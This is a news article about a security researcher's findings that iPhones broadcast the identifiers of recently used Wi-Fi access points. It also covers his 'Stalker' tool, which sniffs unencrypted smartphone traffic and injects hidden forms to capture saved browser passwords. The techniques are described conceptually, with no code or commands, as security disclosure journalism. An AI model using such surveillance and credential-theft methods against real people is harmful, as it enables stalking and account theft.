As a security professional who gets paid to hack into high-value networks, Mark Wuergler often gets a boost when his targets use smartphones, especially when the device happens to be an iPhone that regularly connects to Wi-Fi networks.

That's because the iPhone is the only smartphone he knows of that transmits to anyone within range the unique identifiers of the past three wireless access points the user has logged into. He can then use off-the-shelf hardware to passively retrieve the routers' MAC (media access control) addresses and look them up in databases such as Google Location Services and the Wireless Geographic Logging Engine. By allowing him to pinpoint the precise location of the wireless network, iPhones give him a quick leg-up when performing reconnaissance on prospective marks.

"This is interesting on a security level because I'll know where you work, I'll know where you live, and know where you frequent," Wuergler, who is a Senior Security Researcher for Miami-based Immunity Inc., told Ars. "If the last access point you connected to was your home, for example, I'll know right where to go to get to you later or get to your data. If I'm an attacker that wants to break into your company, this becomes a disclosure that an attacker isn't going to pass up."

The exposure of MAC addresses extends not only to iPhones, but to all Apple devices with Wi-Fi capabilities, he said. It means that whenever the wireless features are enabled and not connected to a network—for instance, during a brief encounter at a Starbucks—they broadcast the unique identifiers, and it's trivial for anyone nearby to record them. Wuergler speculates the behavior is a feature designed to automate configuration for networks users regularly access.

Apple did not respond to our requests for comment for this article.

Smartphones of all stripes

While MAC address leakage appears to be unique to Apple products (according to Wuergler), smartphones of all stripes expose so much valuable information that Wuergler has created an application he calls "Stalker" to streamline its collection. Running on a laptop, Stalker vacuums up passwords, images, email and any other data that is sent unencrypted and organizes it in an easy-to-read interface.

Previously accessed network names and unencrypted Facebook chats, emails, and attached documents are all there, along with the name of each smartphone user who exposed them. Stalker presents the collected data in aggregate or allows the user to view the contents retrieved from a specific smartphone owner. Stalker also calls on programming interfaces offered by Google and other location services to automatically plot the recently connected Wi-Fi networks on a map.

In some cases, it's possible for Wuergler and his colleagues to pinpoint people with ties to a given company just by examining the information Stalker has passively collected. When, for example, the researchers encounter a phone that has recently connected to Wi-Fi networks with the names IBM-Corp and IBM-Conference, they know the device had successfully connected to those SSIDs at least once before. Like the MAC addresses leaked by iPhones, this data is shared each time a smartphone of any type tries to connect to an access point.

In other cases, the names of friends and colleagues exposed in email and encounters on Facebook and other sites can give the attackers the personal information they need to trick their mark into revealing even more sensitive information. They have also devised ways to mine any manner of smartphone apps for personal information that is routinely sent in the clear. An app for the Pandora music service, for instance, reveals the birth year, zip code, and sex the user used to register an account.

In theory, smartphone apps can use the secure sockets layer protocol to prevent sensitive information from being spied on. The problem is that many apps still don't provide a way for users to know when their sessions are protected. And frequently those protections aren't enabled by default and must be turned on deep in the phone's configuration menu. In the case of exposed MAC addresses and SSIDs, there's no way at all to shield that data from prying eyes other than to erase entries from the phone each time a network has been accessed.

Stalker also has the capability to steal login credentials from browsers that store passwords. It works by injecting hidden forms into a user's browsing session that mimic the forms used to log in to corporate email accounts and websites. Because the fields are invisible, they can be added even when the target is visiting a completely unrelated site, giving little indication anything is awry.

Stalker relies on what its author calls a "Man Within Range of You" attack. Unlike man-in-the-middle exploits—in which a hacker sits between the victim and the site he's connecting to and monitors or tampers with data as its passed from one to the other—the app plucks data from radio signals transmitted in the vicinity of the smartphone and relies on the same airwaves to broadcast spoofed information back to the targeted device. When successful, so-called race conditions work by zapping the falsified data to the target before the legitimate source can.

Give me convenience or give me security

In many respects, Stalker is a dramatic example of the risks posed by today's smartphone, which was designed with speed and utility as its chief selling points.

"It's widening all of the attack vectors that I can use against you," Wuergler said. "All of the conveniences that are being extended to you are also being extended to an attacker, just making it easier for identity thieves and corporate attackers."

He said the best advice for people concerned about smartphone security is to limit the kinds of personal information they entrust to their devices. Users can also benefit by turning off their device's Wi-Fi as much as possible.

"I do use my phone on wireless networks, but I don't store a lot of personal data on my phone," he said. "If you put your personal data on there, you don't even need to be connected to a wireless network for me to be able to break into your phone."

Update:

(Wuergler said he has tested a variety of phones running iOS, Android and Blackberry operating systems, but has not provided Ars with a specific list.)

Updated to reflect that IBM-Corp and IBM-Conference were hypothetical SSIDs.